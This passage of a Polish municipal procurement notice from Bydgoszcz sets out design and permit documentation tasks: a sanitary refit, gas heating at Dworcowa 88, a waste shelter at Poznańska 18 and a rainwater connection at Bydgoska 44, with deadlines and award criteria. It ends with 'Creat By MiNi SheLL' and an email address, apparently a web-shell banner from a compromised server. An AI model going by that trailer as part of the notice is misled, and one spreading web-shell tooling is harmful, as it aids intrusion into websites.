-  wykonanie izolacji przeciwwilgociowej ścian i sufitów w pomieszczeniach sanitarnych
-  ułożenie terakoty na podłodze i glazury na ścianach - do wysokości  2,0 m oraz niezbędne prace malarskie
-  montaż stolarki drzwiowej
- zaprojektowanie wykonania prawidłowej wentylacji pomieszczenia sanitarnego, z uzyskaniem opinii kominiarskiej przez projektanta na podstawie której zostanie zaprojektowana wentylacja pomieszczeń sanitarnych
2) prace w branży sanitarnej:
- wykonanie nowej instalacji wod-kan z uwzględnieniem prawidłowego podłączenia do kanalizacji sanitarnej wraz z  opomiarowaniem
- wyposażenie lokali w urządzenia sanitarne wraz z wykonaniem podłączeń wod.-kan.
- przebudowę instalacji centralnego ogrzewania i ciepłej wody użytkowej 
3) prace w branży elektrycznej: dostosowanie instalacji elektrycznej  w lokalach do nowej  funkcji pomieszczeń
Szczegółowy zakres  zamówienia  obejmuje:
1) opracowanie inwentaryzacji budowlanej, na podstawie której należy zaprojektować wykonanie pomieszczenia WC (z wyposażeniem) w obrębie każdego lokalu mieszkalnego, z odprowadzeniem ścieków do istniejącej kanalizacji oraz przebudowę instalacji centralnego ogrzewania i ciepłej wody użytkowej. 
2) wykonanie dokumentacji (wielobranżowy projekt budowlany) uwzględniającej wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., kosztorys należy podzielić na poszczególne rodzaje robót (branże) oraz osobno dla każdego lokalu (pliki   dostarczyć w rozszerzeniu pdf i ath. )
- przedmiar robót (wersja papierowa: 2 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz., z                   podziałem na części tak jak kosztorys inwestorski)  oraz osobno dla każdego lokalu (pliki  dostarczyć w rozszerzeniu pdf i ath. )
c) szczegółowa specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej - 2 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,
2) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii (w tym miejskiego Konserwatora Zabytków jeśli zachodzi taka potrzeba) itp. dokumentów do opracowania  dokumentacji projektowej oraz  do  uzyskania   decyzji  pozwolenia na wykonanie robót budowlanych.
3) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji              pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).

1. Termin wykonania i dostarczenia Zamawiającemu dokumentacji projektowo-kosztorysowej:
1. 60 dni od daty podpisania umowy przez Wykonawcę.
2. Zamawiający w terminie 7 dni (roboczych) od daty otrzymania dokumentacji zobowiązany jest do wniesienia ewentualnych uwag bądź akceptacji dokumentacji projektowej.
3. Wykonawca w terminie 7 dni od daty otrzymania uwag od Zamawiającego - zobowiązany jest przekazać dokumentację zweryfikowaną w zakresie zgłoszonych przez Zamawiającego uwag. Zamawiający dokonuje przeglądu tak zweryfikowanej dokumentacji przy odpowiednim zastosowaniu ust.2.
4. Wykonawca niezwłocznie - lecz nie dłużej niż w terminie 3 dni (roboczych) - od daty akceptacji dokumentacji przez Zamawiającego, co zostanie potwierdzone spisanym przez strony protokołem, zobowiązany jest złożyć do WAB-u wniosek o wydanie decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową.
5.  Wykonawca zobowiązany w terminie 3 dni  od  daty uzyskania decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową - dostarczyć  Zamawiającemu kopię tej decyzji.
6. Strony przewidują, że decyzja pozwolenia na wykonanie robót objętych dokumentacją projektową zostanie dostarczona Zamawiającemu przez Wykonawcę w terminie 90 dni od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo-kosztorysowej, o którym mowa w pkt.1. 
7.  Wykonawca zobowiązany jest w trakcie realizacji zamówienia - do niezwłocznego - w ciągu 3 dni                     od dnia powzięcia informacji, przedkładania w formie pisemnej lub elektronicznej Zamawiającemu (osobie wskazanej  w umowie)  następujących dokumentów:
1)  kopii złożonego do WAB-u wniosku o wydanie decyzji pozwolenia na wykonanie robót z pieczątką jego wpływu do tego organu,
2)  kopii zawiadomienia o wszczęciu postępowania przez WAB UM niezwłocznie po jego otrzymaniu,                  
3) kopii otrzymanego postanowienia dotyczącego postępowania administracyjnego prowadzonego przez WAB niezwłocznie po jego otrzymaniu,
4) kopii potwierdzającej usunięcie nieprawidłowości lub braków wyszczególnionych w postanowieniu -  z data ich usunięcia,  
5) kopii wystąpienia do WAB-u o zawieszenie postępowania (z datą wpływu do tego organu) wraz z pisemnym wyjaśnieniem dla Zamawiającego o powodach zawieszenia,
6)  kopii decyzji pozwolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania dokumentacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3:
obejmuje wykonanie dokumentacji projektowo-kosztorysowej (zwanej dalej dokumentacją) na                       wyposażenie lokalu nr 1A w budynku przy ul. Dworcowej 88 w ogrzewanie gazowe. 
Zakres zamówienia nie obejmuje obowiązku uzyskania przez Wykonawcę decyzji zatwierdzającej                   projekt budowlany i udzielającej pozwolenia na wykonanie robót budowlanych, którą to Zamawiający uzyska samodzielnie we własnym zakresie. 
Szczegółowy  zakres  zamówienia  obejmuje:
1) uzyskanie przez Wykonawcę we własnym zakresie, w ramach wynagrodzenie ofertowego (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, map,  opinii itp. - niezbędnych do opracowania dokumentacji projektowej i uzyskania przez Zamawiającego  decyzji pozwolenia na wykonanie robót budowlanych.
2) wykonanie inwentaryzacji budowlanej dla celów projektowych z naniesieniem lokalizacji i rodzaju istniejących źródeł grzania i ciepłej wody użytkowej 
3) opracowanie wielobranżowego  projektu budowlanego (wykonawczy):
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP  i p. poż. 
4) sporządzenie przedmiarów robót, kosztorysów inwestorskich, STWiOR :
a) dokumentacja kosztorysowa winna  zawierać:
- kosztorys inwestorski: wersja papierowa - 3 egz., na nośniku  elektronicznym - płyta CD/DVD, 1 egz., 
- przedmiar robót : wersja papierowa - 3 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz.,   
b) szczegółowa specyfikacja techniczna wykonania i odbioru robót: winna być sporządzona w wersji                   papierowej - 3 egzemplarze oraz  zapisana na nośniku elektronicznym - płyta  CD/DVD, 1 egz.,
Zakres opracowania projektu obejmuje:
-  projekt rozbudowy instalacji gazowej do zasilania projektowanego kotła gazowego 2-funkcyjnego na cele centralnego ogrzewania i ciepłej wody użytkowej,
- projekt instalacji centralnego ogrzewania z podaniem współczynników przenikania ciepła istniejących przegród budowlanych, wykonaniem obliczeń projektowanego obciążenie cieplnego, doborem średnic i              lokalizacji przewodów c.o., doborem źródła ciepła, przewodów wentylacyjnych i spalinowych, doborem grzejników wraz z zakresem niezbędnych robót budowlanych i elektrycznych
-  projekt instalacji ciepłej wody użytkowej z wykonaniem obliczeń hydraulicznych, doborem średnic i lokalizacji przewodów c.w.u. wraz z zakresem niezbędnych robót budowlanych i elektrycznych
-  projekt instalacji elektrycznej zasilania projektowanych urządzeń elektrycznych i zabezpieczenia instalacji c.o. i c.w.u. wykonanej z materiałów metalowych.
1.  Termin wykonania i dostarczenia Zamawiającemu dokumentacji projektowo-kosztorysowej:60 dni od daty podpisania umowy przez Wykonawcę
2. Zamawiający w terminie 7 dni (roboczych) od daty otrzymania dokumentacji zobowiązany jest do wniesienia ewentualnych uwag bądź akceptacji dokumentacji projektowej.
3. Wykonawca w terminie 7 dni od daty otrzymania uwag od Zamawiającego - zobowiązany jest przekazać dokumentację zweryfikowaną w zakresie zgłoszonych przez Zamawiającego uwag. Zamawiający dokonuje przeglądu tak zweryfikowanej dokumentacji przy odpowiednim zastosowaniu ust.2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania dokumentacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4:
obejmuje opracowanie dokumentacji projektowo-kosztorysowej (zwanej dalej dokumentacją) na                wykonanie wiaty śmietnikowej na terenie nieruchomości przy ul. Poznańskiej 18 (działka nr 63/4             obręb 96 - skwer znajdujący się w strefie ochrony konserwatorskiej) oraz uzyskanie przez Wykonawcę                        decyzji  pozwolenia na wykonanie robót  objętych dokumentacją. Projektowana wiata śmietnikowa na                potrzeby obsługi  posesji przy ul. Poznańskiej 16 . 
Szczegółowy zakres zamówienia obejmuje: 
1) uzyskanie przez Wykonawcę we własnym zakresie, w ramach wynagrodzenie ofertowego (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii (w tym miejskiego Konserwatora Zabytków) i innych dokumentów - niezbędnych Wykonawcy do opracowania dokumentacji projektowej i uzyskania  decyzji pozwolenia na   wykonanie robót budowlanych.
2) opracowanie projektu budowlanego w ilości 5 egzemplarzy (w wersji papierowej) - określającej zakres, parametry techniczne i ekonomiczne przedsięwzięcia, ze wskazaniem rozwiązania optymalnego z punktu widzenia kosztów realizacji tego przedsięwzięcia - zawierającej:
a)  warunki BIOZ, wytyczne BHP i  p. poż. 
b) szczegółowy kosztorys inwestorski: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., 
c)  szczegółowy przedmiar robót:  wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD,  1 egz., 
d)  szczegółową specyfikację techniczną wykonania i odbioru robót: wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz.,
3) uzyskanie akceptacji dokumentacji projektowej przez Miejskiego Konserwatora Zabytków oraz Wydział Gospodarki  Komunalnej  i Ochrony Środowiska  UM Bydgoszcz.
4) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
1. Termin wykonania i dostarczenia Zamawiającemu dokumentacji projektowo-kosztorysowej: 40 dni od daty podpisania umowy przez Wykonawcę
2. Zamawiający w terminie 7 dni (roboczych) od daty otrzymania dokumentacji zobowiązany jest do wniesienia ewentualnych uwag bądź akceptacji dokumentacji projektowej.
3. Wykonawca w terminie 7 dni od daty otrzymania uwag od Zamawiającego - zobowiązany jest przekazać dokumentację zweryfikowaną w zakresie zgłoszonych przez Zamawiającego uwag. Zamawiający dokonuje przeglądu tak zweryfikowanej dokumentacji przy odpowiednim zastosowaniu ust.2.
4. Wykonawca niezwłocznie - lecz nie dłużej niż w terminie 3 dni (roboczych) - od daty akceptacji dokumentacji przez Zamawiającego, co zostanie potwierdzone spisanym przez strony protokołem, zobowiązany jest złożyć do WAB-u wniosek o wydanie decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową.
5.  Wykonawca zobowiązany w terminie 3 dni  od  daty uzyskania decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową - dostarczyć  Zamawiającemu kopię tej decyzji.
6. Strony przewidują, że decyzja pozwolenia na wykonanie robót objętych dokumentacją projektową zostanie dostarczona Zamawiającemu przez Wykonawcę w terminie 90 dni od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo-kosztorysowej, o którym mowa w pkt.1. 
7.  Wykonawca zobowiązany jest w trakcie realizacji zamówienia - do niezwłocznego - w ciągu 3 dni                     od dnia powzięcia informacji, przedkładania w formie pisemnej lub elektronicznej Zamawiającemu (osobie wskazanej  w umowie)  następujących dokumentów:
1)  kopii złożonego do WAB-u wniosku o wydanie decyzji pozwolenia na wykonanie robót z pieczątką jego wpływu do tego organu,
2)  kopii zawiadomienia o wszczęciu postępowania przez WAB UM niezwłocznie po jego otrzymaniu,                  
3) kopii otrzymanego postanowienia dotyczącego postępowania administracyjnego prowadzonego przez WAB niezwłocznie po jego otrzymaniu,
4) kopii potwierdzającej usunięcie nieprawidłowości lub braków wyszczególnionych w postanowieniu -  z data ich usunięcia,  
5) kopii wystąpienia do WAB-u o zawieszenie postępowania (z datą wpływu do tego organu) wraz z pisemnym wyjaśnieniem dla Zamawiającego o powodach zawieszenia,
6)  kopii decyzji pozwolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5:
obejmuje opracowanie dokumentacji projektowo-kosztorysowej (zwanej dalej dokumentacją)  na                podłączenie budynku gminnego przy ul. Bydgoskiej 44 w Bydgoszczy do miejskiej kanalizacji                          deszczowej oraz uzyskanie przez Wykonawcę  decyzji zatwierdzającej projekt budowlany i udzielającej pozwolenia na wykonanie robót. 
Szczegółowy zakres zamówienia obejmuje :
1) opracowanie inwentaryzacji budowlanej, na podstawie której należy zaprojektować doprowadzenie instalacji deszczowej do rur spustowych
2) wykonanie dokumentacji projektowej uwzględniającej wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi - obejmującej: 
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz.,               (pliki dostarczyć w rozszerzeniu pdf i ath. )
- przedmiar robót (wersja papierowa: 2 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz.,                        (pliki  dostarczyć  w rozszerzeniu pdf i ath. )
c) szczegółowa specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej - 2 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,
2) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii i innych dokumentów niezbędnych Wykonawcy do                 opracowania  dokumentacji projektowej oraz  do  uzyskania  przez niego  decyzji  pozwolenia na wykonanie robót budowlanych.
3) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji                 pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
1. Termin wykonania i dostarczenia Zamawiającemu dokumentacji projektowo-kosztorysowej: 40 dni od daty podpisania umowy przez Wykonawcę
2. Zamawiający w terminie 7 dni (roboczych) od daty otrzymania dokumentacji zobowiązany jest do wniesienia ewentualnych uwag bądź akceptacji dokumentacji projektowej.
3. Wykonawca w terminie 7 dni od daty otrzymania uwag od Zamawiającego - zobowiązany jest przekazać dokumentację zweryfikowaną w zakresie zgłoszonych przez Zamawiającego uwag. Zamawiający dokonuje przeglądu tak zweryfikowanej dokumentacji przy odpowiednim zastosowaniu ust.2.
4. Wykonawca niezwłocznie - lecz nie dłużej niż w terminie 3 dni (roboczych) - od daty akceptacji dokumentacji przez Zamawiającego, co zostanie potwierdzone spisanym przez strony protokołem, zobowiązany jest złożyć do WAB-u wniosek o wydanie decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową.
5.  Wykonawca zobowiązany w terminie 3 dni  od  daty uzyskania decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową - dostarczyć  Zamawiającemu kopię tej decyzji.
6. Strony przewidują, że decyzja pozwolenia na wykonanie robót objętych dokumentacją projektową zostanie dostarczona Zamawiającemu przez Wykonawcę w terminie 90 dni od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo-kosztorysowej, o którym mowa w pkt.1. 
7.  Wykonawca zobowiązany jest w trakcie realizacji zamówienia - do niezwłocznego - w ciągu 3 dni                     od dnia powzięcia informacji, przedkładania w formie pisemnej lub elektronicznej Zamawiającemu (osobie wskazanej  w umowie)  następujących dokumentów:
1)  kopii złożonego do WAB-u wniosku o wydanie decyzji pozwolenia na wykonanie robót z pieczątką jego wpływu do tego organu,
2)  kopii zawiadomienia o wszczęciu postępowania przez WAB UM niezwłocznie po jego otrzymaniu,                  
3) kopii otrzymanego postanowienia dotyczącego postępowania administracyjnego prowadzonego przez WAB niezwłocznie po jego otrzymaniu,
4) kopii potwierdzającej usunięcie nieprawidłowości lub braków wyszczególnionych w postanowieniu -  z data ich usunięcia,  
5) kopii wystąpienia do WAB-u o zawieszenie postępowania (z datą wpływu do tego organu) wraz z pisemnym wyjaśnieniem dla Zamawiającego o powodach zawieszenia,
6)  kopii decyzji pozwolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania dokumentacji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com